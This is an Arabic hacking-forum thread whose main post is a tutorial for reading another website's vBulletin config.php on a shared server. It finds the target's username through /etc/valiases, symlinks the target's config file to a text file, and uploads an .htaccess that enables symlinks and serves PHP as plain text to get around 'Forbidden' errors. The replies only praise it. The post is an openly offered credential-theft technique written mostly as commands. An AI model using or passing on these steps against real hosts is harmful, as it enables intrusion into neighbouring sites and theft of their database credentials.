Call Any Config + Bypass Forbidden

آلسلآم عليكم ورحمه الله وبركاته بعد القطعة الطويلة نرجع بدرس جديد بآذن آلله , أول شيء آعمل مجلد بآسم [ Hamad ] , نفذ الامر Mkdir Hamad بعد...

I

Injection

:: Interactive Developer ::
Call Any Config + Bypass Forbidden
آلسلآم عليكم ورحمه الله وبركاته

بعد القطعة الطويلة نرجع بدرس جديد بآذن آلله ,

أول شيء آعمل مجلد بآسم [ Hamad ] ,

نفذ الامر

PHP: 
Mkdir Hamad

بعد ذالك نستخرج يوزر الموقع المستهدف ..

PHP: 
ls -la /etc/valiases/hamad.com

غير الرابط الى الموقع المستهدف بعد ذالك مثلا اليوزر

PHP: 
Hamad

نسحب الكونفق عن طريق الامر التالي

PHP: 
ln -s /home/sec4/public_html/vb/includes/config.php a.txt

بعد ذالك نحاول نستعرض الملف [ Forbidden ] الحل ارفع الهاتكس التالي

PHP: 
Options +FollowSymLinks 
DirectoryIndex Sux.html 
Options +Indexes 
AddType text/plain .php 
AddHandler server-parsed .php 
AddType text/plain .html

تم التخطي اتمنه الشرح كان وآضح

Special Thankss to : vbspiders & v4-team & Black Hat Team
 
اسم الموضوع : Call Any Config + Bypass Forbidden | المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
C

Cyber Code

<img src="http://vbspiders.com/vb/images/rank/prin
HaCkEr
Call Any Config + Bypass Forbidden
رد: Call Any Config + Bypass Forbidden

good work , keep going :)
 
D

Dr.Unkn0wn

<b/>.:: لا إله إلا الله محمد رسول الله ::.<b>
Call Any Config + Bypass Forbidden
رد: Call Any Config + Bypass Forbidden

GooD Work Man, Keep It On Fire ;)
 
I

Injection

:: Interactive Developer ::
Call Any Config + Bypass Forbidden
رد: Call Any Config + Bypass Forbidden

آهلا وسهلا اخواني منورين
 
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
أعلى